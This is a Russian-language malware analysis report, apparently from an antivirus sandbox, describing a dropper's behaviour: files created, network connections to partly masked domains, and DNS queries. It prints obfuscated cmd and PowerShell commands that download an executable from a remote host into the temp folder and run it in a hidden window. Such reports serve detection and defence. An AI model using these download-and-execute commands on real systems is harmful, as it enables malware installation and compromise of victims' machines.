Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c p^o^w^e^r^s^h^e^l^l.e^xe -w 1 Start-Sleep 10;%Temp%\DjYcS.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' (nEw-oBjecT Net.WebcLIENt).('Down'+'loadFile').Invoke('http://iu##.vip/cqdui',$env:Temp+'\DjYcS.exe')
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\djycs.exe
Сетевая активность
Подключается к
- 'iu##.vip':80
- 'li####yledrinks.pl':80
UDP
- DNS ASK iu##.vip
- DNS ASK li####yledrinks.pl
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c p^o^w^e^r^s^h^e^l^l.e^xe -w 1 Start-Sleep 10;%Temp%\DjYcS.exe' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' (nEw-oBjecT Net.WebcLIENt).('Down'+'loadFile').Invoke('http://iu##.vip/cqdui',$env:Temp+'\DjYcS.exe')' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 Start-Sleep 10;%TEMP%\DjYcS.exe
